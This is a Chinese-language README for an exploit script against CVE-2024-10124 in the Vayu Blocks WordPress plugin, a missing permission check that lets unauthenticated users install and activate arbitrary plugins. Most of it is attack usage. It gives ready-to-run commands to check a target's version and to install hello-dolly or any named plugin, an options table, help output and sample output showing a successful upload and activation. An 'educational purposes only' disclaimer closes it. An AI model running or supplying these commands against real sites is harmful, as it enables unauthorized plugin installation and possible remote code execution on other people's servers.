WordPress 的 Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce 插件在所有版本(包括 1.1.1)中,由于 tp_install() 函数缺少权限检查,存在未授权安装和激活任意插件的漏洞。这使得未经身份验证的攻击者能够安装和激活任意插件,如果另一个易受攻击的插件已被安装并激活,则可能被利用来实现远程代码执行。该漏洞已在 1.1.1 版本中进行了部分修复。
python CVE-2024-10124.py -u http://192.168.100.74/wordpress --check-version
这将检查 vayu-blocks 插件的版本,以确定该站点是否存在漏洞。
python CVE-2024-10124.py -u http://192.168.100.74/wordpress
这将安装默认插件 hello-dolly
python CVE-2024-10124.py -u http://192.168.100.74/wordpress -p plugin_name
这将在目标站点上安装 plugin_name 插件。
| 🔍 | 命令 | 描述 | 示例 |
|---|---|---|---|
| 🌐 | -u or --url | 指定 WordPress 站点的目标 URL。 | -u http://192.168.100.74/wordpress |
| 🔒 | --check-version | 检查站点是否基于版本存在漏洞。 | -u http://192.168.100.74/wordpress --check-version |
| ⚙️ | -p or --plugin | 指定插件名称(默认为 hello-dolly)。 | -u http://192.168.100.74/wordpress -p plugin_name |
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL (e.g., http://192.168.100.74/wordpress)
-p PLUGIN, --plugin PLUGIN
Plugin name (default: hello-dolly)
--check-version Check if the site is vulnerable based on plugin version
Response Status Code: 200
The plugin has been successfully uploaded and activated.
Response Content: "http:\/\/192.168.100.74\/wordpress"
此脚本仅用于教育目的。作者不对因滥用此脚本而造成的任何损害负责。